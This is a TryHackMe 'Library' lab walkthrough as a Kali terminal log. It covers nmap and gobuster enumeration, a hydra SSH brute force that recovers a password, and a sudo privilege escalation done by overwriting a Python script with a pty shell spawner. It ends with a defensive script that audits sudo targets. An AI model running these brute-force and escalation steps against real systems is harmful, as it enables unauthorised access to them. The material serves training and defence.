[TryHackMe]Library
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- --min-rate 5000 $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 00:33 JST
Warning: 10.10.57.63 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.57.63
Host is up (0.26s latency).
Not shown: 40893 closed tcp ports (conn-refused), 24640 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.22 seconds
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://$IP:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -q
Error: error on running gobuster: unable to connect to http://10.10.57.63:8080/: Get "http://10.10.57.63:8080/": dial tcp 10.10.57.63:8080: connect: connection refused
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://$IP-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -q
Error: required flag(s) "wordlist" not set
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -q
/images (Status: 301) [Size: 311] [--> http://10.10.57.63/images/]
/server-status (Status: 403) [Size: 299]
┌──(kali㉿kali)-[~]
└─$ hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 02:03:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.57.63:22/
[STATUS] 152.00 tries/min, 152 tries in 00:01h, 14344248 to do in 1572:51h, 15 active
[22][ssh] host: 10.10.57.63 login: meliodas password: iloveyou1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-16 02:05:46
┌──(kali㉿kali)-[~]
└─$ ssh meliodas@$IP
meliodas@10.10.57.63's password:
Permission denied, please try again.
meliodas@10.10.57.63's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Sat Aug 24 14:51:01 2019 from 192.168.15.118
meliodas@ubuntu:~$ ls
bak.py user.txt
meliodas@ubuntu:~$ cat user.txt
xxxxx
meliodas@ubuntu:~$ cat bak.py
#!/usr/bin/env python
import os
import zipfile
def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))
if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()
meliodas@ubuntu:~$ ll
total 40
drwxr-xr-x 4 meliodas meliodas 4096 Aug 24 2019 ./
drwxr-xr-x 3 root root 4096 Aug 23 2019 ../
-rw-r--r-- 1 root root 353 Aug 23 2019 bak.py
-rw------- 1 root root 44 Aug 23 2019 .bash_history
-rw-r--r-- 1 meliodas meliodas 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 meliodas meliodas 3771 Aug 23 2019 .bashrc
drwx------ 2 meliodas meliodas 4096 Aug 23 2019 .cache/
drwxrwxr-x 2 meliodas meliodas 4096 Aug 23 2019 .nano/
-rw-r--r-- 1 meliodas meliodas 655 Aug 23 2019 .profile
-rw-r--r-- 1 meliodas meliodas 0 Aug 23 2019 .sudo_as_admin_successful
-rw-rw-r-- 1 meliodas meliodas 33 Aug 23 2019 user.txt
meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User meliodas may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
meliodas@ubuntu:~$ rm bak.py
rm: remove write-protected regular file 'bak.py'? y
meliodas@ubuntu:~$ nano bak.py
meliodas@ubuntu:~$ cat bak.py
import pty
pty.spawn("/bin/sh")
meliodas@ubuntu:~$ sudo python bak.py
[sudo] password for meliodas:
Sorry, user meliodas is not allowed to execute '/usr/bin/python bak.py' as root on ubuntu.
meliodas@ubuntu:~$ sudo python /home/meliodas/bak.py
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
xxx
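The sudo rule in the session above points at a root-owned script inside a directory that meliodas owns, which is why rm and nano could replace it. The following is an added example, not part of the original write-up: a check an administrator could run over sudoers script targets. The listing is constructed from the ll output; uid 1000 for meliodas, the mode of / and all helper names are assumptions.

```python
import os
import stat
from collections import namedtuple

# Minimal stat record so the audit runs on constructed data as well as os.lstat.
Meta = namedtuple("Meta", "st_uid st_mode")

# Constructed from the `ll` output above (uid 1000 and the "/" entry are assumed).
PAGE_LISTING = {
    "/": Meta(0, 0o040755),
    "/home": Meta(0, 0o040755),
    "/home/meliodas": Meta(1000, 0o040755),
    "/home/meliodas/bak.py": Meta(0, 0o100644),
}


def ancestors(path):
    """Yield path itself, then each parent directory up to '/'."""
    path = os.path.abspath(path)
    while True:
        yield path
        parent = os.path.dirname(path)
        if parent == path:
            return
        path = parent


def audit_sudo_target(path, trusted_uids=(0,), lstat=os.lstat):
    """Return (component, reason) pairs that let a non-root user replace `path`."""
    findings = []
    for comp in ancestors(path):
        st = lstat(comp)
        if st.st_uid not in trusted_uids:
            findings.append((comp, "owned by uid %d" % st.st_uid))
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            # A sticky directory only lets owners unlink their own entries,
            # and every entry below it is checked for trusted ownership too.
            sticky = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
            if not sticky:
                findings.append((comp, "group/world-writable"))
    return findings


if __name__ == "__main__":
    for comp, reason in audit_sudo_target("/home/meliodas/bak.py",
                                          lstat=PAGE_LISTING.__getitem__):
        print("%s: %s" % (comp, reason))
```

On a live host, call audit_sudo_target with the default lstat for each script path named in sudoers; any finding means the script should move to a root-owned path such as a directory under /usr/local.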